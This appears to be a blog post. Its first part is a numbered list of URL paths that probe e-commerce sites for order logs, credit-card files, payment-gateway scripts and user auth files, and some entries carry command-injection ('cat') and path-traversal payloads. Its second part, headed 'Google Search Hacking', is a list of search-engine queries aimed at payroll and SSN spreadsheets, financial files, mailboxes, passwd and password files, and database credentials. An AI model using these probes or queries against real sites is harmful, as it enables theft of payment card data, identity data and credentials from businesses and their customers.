393. /config/datasources/store/billing.mdb
394. /_database/shopping350.mdb
395. /cgi-bin/shopper.exe?search
396. /cgi/shop.pl/page=;cat%20shop.pl
397. /cgi-bin/store/Admin_files/orders.txt
398. /cgi-bin/store/commerce_user_lib.pl
399. /cgi-sys/pagelog.cgi
400. /cgi-sys/shop.pl/page=;cat%20shop.pl
401. /scripts/weblog
402. /fpdb/shopping400.mdb
403. /htbin/shop/orders/orders.txt
404. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
405. /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
406. /mall_log_files/
407. /cgi-bin/perlshop.cgi
408. /tienda/shopdbtest.asp
409. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
410. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
411. /WebShop/logs/ck.log
412. /fpdb/shopping300.mdb
413. /mysql/store.mdb
414. /cgi-bin/store/Admin_files/commerce_user_lib.pl
415. /config.dat
416. /order/order.log
417. /commerce_user_lib.pl
418. /Admin_files/AuthorizeNet_user_lib.pl
419. /cvv2.asp
420. /cgi-bin/cart32/CART32-order.txt
421. /wwwlog
422. /cool-logs/mlog.html
423. /cgi-bin/pass/merchant.cgi.log
424. /cgi-local/pagelog.cgi
425. /cgi-bin/pagelog.cgi
426. /cgi-bin/orders/cc.txt
427. /cgis/shop/orders/orders.txt
428. /admin/admin_conf.pl
429. /cgi-bin/pdg_cart/order.log
430. /cgi/PDG_Cart/order.log
431. /Admin_files/ccelog.txt
432. /cgi-bin/orders/mc.txt
433. /cgi/cart32.exe
434. /ecommerce/admin/admin.asp
435. /scripts/DCShop/auth_data/auth_user_file.txt
436. /Catalog/config/datasources/Expire.mdb
437. /ecommerce/admin/shopdbtest.asp
438. /mysql/mystore.mdb
439. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
441. /cgi-bin/Count.cgi?df=callcard.dat
442. /logfiles/
443. /shopping/shopping350.mdb
444. /admin/configuration.pl
445. /cgis/DCShop/auth_data/auth_user_file.txt
446. /cgis/cart32.exe
447. /cgi-bin/dcshop.cgi
448. /cgi-win/shop/auth_data/auth_user_file.txt
449. /shopping400.mdb
450. /HBill/config
451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log
452. /search=action&keywords=GSD%20&template=order.log
453. /WebCart/orders.txt
454. /PDG_Cart/authorizenets.txt
455. /cgi-bin/AnyForm2
456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat
457. /cgi-bin/PDG_Cart/order.log
458. /expire.mdb
459. /logger/
460. /webcart-lite/orders/import.txt
461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
462. /cgi-bin/PDG_Cart/shopper.conf
463. /cgi-bin/cart32.exe
464. /dc/orders/orders.txt
465. /cgi-local/DCShop/orders/orders.txt
466. /shop.pl/page=shop.cfg
467. /cgi-local/cart32.exe
468. /cgi-win/pagelog.cgi
469. /cgi-win/shop/orders/orders.txt
470. /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
471. /cgi-sys/DCShop/auth_data/auth_user_file.txt
472. /cgi-bin/www-sql;;;
473. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
474. /scripts/orders/orders.txt
475. /cgi-local/shop.pl/shop.cfg
476. /search=action&keywords=cwtb%20&template=expire.mdb
477. /php/mylog.phtml
478. /config/datasources/shopping.mdb
479. /php-coolfile/action.php?action=edit&file=config.php
480. /cgi-bin/ezmall2000/mall2000.cgi
481. /cgi/DCShop/orders/orders.txt
482. /cgi-local/shop.pl
483. /cgis/DCShop/orders/orders.txt
484. /product/shopdbtest.asp
485. /ASP/cart/database/metacart.mdb
486. /cgi-bin/cgi-lib.pl
487. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
488. /search=action&keywords=cwtb%20&template=order.log
489. /mysql/expire.mdb
490. /scripts/shop/auth_data/auth_user_file.txt
491. /cgi-bin/cart32/whatever-OUTPUT.txt
492. /Shopping%20Cart/shopdbtest.asp
493. /cgi/shop/auth_data/auth_user_file.txt
494. /shop/shopping350.mdb
495. /cgi-bin/store/Authorize_Net.pl
496. /scripts/DCShop/orders/orders.txt
497. /store/log_files/commerce_user_lib.pl
498. /shopping/shopadmin.asp
499. /cgi-bin/orderlog.txt
500. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
501. /cool-logs/mylog.html
502. /cgibin/shop.pl/page=;cat%20shop.pl
503. /htbin/shop.pl/page=;cat%20shop.pl
504. /cgi-win/orders/orders.txt
505. /cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
506. /SHOP/shopdbtest.asp
507. /cgi/pagelog.cgi
508. /php/mlog.phtml
509. /cgi-bin/shop/apdproducts.mdb
510. /htbin/shop/auth_data/auth_user_file.txt
511. /server%20logfile;;;
512. /database/metacart.mdb
513. /cgi-local/shop/orders/orders.txt
























































Google Search Hacking Contd... II



But the Question rises What can Google can do for an Ethical Hacker?
Search sensitive information like payroll, SIN, even the personal email box
Vulnerabilities scanner
Transparent proxy


So how bt if i tell u a different way to search
k lets do this type in the following statements n c d results




Salary

Salary filetype: xls site: edu



Security social insurance number

Intitle: Payroll intext: ssn filetype: xls site: edu


Security Social Insurance Number
Payroll intext: Employee intext: ssn Filetype: xls


Filetype: xls “checking account” “credit card” - intext: Application -intext:
Form (only 39 results)



Financial Information

Intitle: “Index of” finances.xls (9)



Personal Mailbox

Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)



Confidential Files

“not for distribution” confidential (1,760)
Confidential Files
“not for distribution” confidential filetype: pdf (marketing info) (456)


OS Detection
Use the keywords of the default installation page of a Web server to search.
Use the title to search
Use the footer in a directory index page


OS Detection-Windows
“Microsoft-IIS/5.0 server at”


OS Detection - Windows
Default web page?
Intitle: “Welcome to Windows 2000 Internet Services” IIS 5.0



OS Detection –Apache 1.3.11-1.3.26
Intitle: Test.Page.for.Apache seeing.this.instead


OS Detection-Apache SSL enable
Intitle: Test.page “SSL/TLS-aware” (127)



Search Passwords

Search the well known password filenames in URL
Search the database connection files or configuration files to find a password and username
Search specific username file for a specific product


Search Passwords

Inurl: etc inurl: passwd



Search Passwords

Intitle: “Index of..etc” passwd


Search Passwords

Intitle: “Index of..etc” passwd


Search Passwords

Inurl: admin.pwd filetype: pwd


Search Passwords

Filetype: inc dbconn





Search Passwords

Filetype: inc intext: mysql_connect




Search Passwords

Filetype: ini +ws_ftp +pwd (get the encrypted passwords)





Search Passwords

Filetype: log inurl: “password.log”




Search Username
+intext: "webalizer" +intext: “Total Usernames” +intext: “Usage Statistics for”


License Key
Filetype: lic lic intext: key (33) (license key)


Sensitive Directories Listing
Powerful buzz word: Index of
Search the well known vulnerable directories names



Sensitive Directories Listing
“index of cgi-bin” (3590)



Sensitive Directories Listing
Intitle: “Index of” cfide (coldfusion directory)


Sensitive Directories Listing
Intitle: index.of.winnt

Posted by at No comments:
Subscribe to: Posts (Atom)